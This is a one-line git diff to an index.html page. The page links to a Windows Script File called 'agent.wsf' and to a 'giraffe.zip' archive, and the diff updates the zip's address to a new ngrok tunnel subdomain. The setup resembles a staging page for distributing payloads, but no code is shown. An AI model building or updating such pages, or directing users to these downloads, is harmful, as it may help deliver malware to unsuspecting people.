--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://8a73-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://e050-2a00-1370-817a-a600-782f-f474-cc17-e763.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
